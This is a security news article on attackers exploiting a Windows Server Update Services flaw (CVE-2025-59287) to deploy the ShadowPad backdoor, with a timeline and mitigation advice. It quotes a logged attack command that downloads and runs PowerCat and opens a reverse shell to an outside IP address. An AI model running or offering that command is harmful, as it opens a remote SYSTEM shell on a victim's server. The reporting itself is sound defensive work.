Critical WSUS RCE (CVE-2025-59287) Actively Exploited to Deploy ShadowPad Backdoor

The AhnLab Security Intelligence Center (ASEC) has uncovered an active exploitation campaign in which threat actors weaponized a newly disclosed remote code execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad, one of the most notorious backdoors linked to multiple Chinese state-aligned APT groups.

ShadowPad—first discovered in 2017—has been continuously updated and privately circulated among Chinese nation-state operators. It has been used in supply-chain intrusions, critical infrastructure breaches, and long-term espionage campaigns.

The timeline uncovered by ASEC shows a rapid weaponization cycle following the release of proof-of-concept exploit code.

ASEC reports: “After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers.”

Microsoft published its advisory on October 14, and by October 22, PoC code had been released publicly. ASEC’s telemetry detected PowerCat activity shortly afterward.

Attackers first targeted Windows Servers with WSUS enabled, leveraging the vulnerability to execute PowerShell commands.

The report states: “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access. They then used PowerCat… to obtain a system shell (CMD).”

The malicious command logged via AhnLab Smart Defense (ASD) infrastructure included:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString(
'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 154.17.26[.]41 -p 8080 -e cmd

This allowed attackers to gain a SYSTEM-level interactive shell.

On November 6, attackers exploited the same WSUS RCE again—this time to drop and decode ShadowPad components using Windows’ built-in tools.

ASEC details: “The threat actor… executed curl.exe and certutil.exe, which are legitimate Windows utilities, to install the ShadowPad malware.”

Downloaded components included:

• tmp.txt → later decoded via certutil into a .tmp file containing core ShadowPad data
• dll.txt
• exe.txt

ShadowPad rarely runs as a standalone binary. Instead, it hides behind a legitimate executable. The .tmp file contains encrypted backdoor configuration and operational modules.

ASEC concludes: “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”

Administrators of Windows Server environments running WSUS are urged to take immediate action:

• Apply Microsoft’s latest security update addressing CVE-2025-59287.
• Restrict WSUS access:
  • Only Microsoft Update servers should access WSUS.
  • Block inbound traffic on TCP 8530 and 8531 from all other sources.
• Audit for suspicious activity:
  • PowerShell, certutil.exe, curl.exe execution histories
  • Unusual network connection logs

Related Posts:

• CRITICAL ALERT: Windows Server WSUS Flaw Actively Exploited (CVE-2025-59287, CVSS 9.8)
• Windows Server Update Services Deprecation: What It Means for Your Update Strategy
• Updated ShadowPad Malware Facilitates Ransomware Deployment in Global Attacks
• Chinese Cyberespionage Groups Probe SentinelOne in Sophisticated ShadowPad and PurpleHaze Campaigns